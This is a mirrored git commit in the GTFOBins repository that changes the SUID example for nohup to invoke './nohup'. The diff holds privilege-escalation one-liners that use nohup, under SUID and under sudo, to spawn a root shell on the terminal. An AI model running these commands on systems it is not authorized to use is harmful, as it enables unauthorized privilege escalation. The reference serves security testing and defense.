mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 14:30:07 +01:00
Add ./ to SUID category in nohup.mp
This commit is contained in:
parent
561a5b2c9a
commit
b43f418ddb
@ -8,7 +8,7 @@ functions:
|
|||||||
nohup "$COMMAND"
|
nohup "$COMMAND"
|
||||||
cat nohup.out
|
cat nohup.out
|
||||||
suid:
|
suid:
|
||||||
- code: nohup /bin/sh -p -c "sh -p <$(tty) >$(tty) 2>$(tty)"
|
- code: ./nohup /bin/sh -p -c "sh -p <$(tty) >$(tty) 2>$(tty)"
|
||||||
sudo:
|
sudo:
|
||||||
- code: sudo nohup /bin/sh -c "sh <$(tty) >$(tty) 2>$(tty)"
|
- code: sudo nohup /bin/sh -c "sh <$(tty) >$(tty) 2>$(tty)"
|
||||||
---
|
---
|
||||||
|
Loading…
Reference in New Issue
Block a user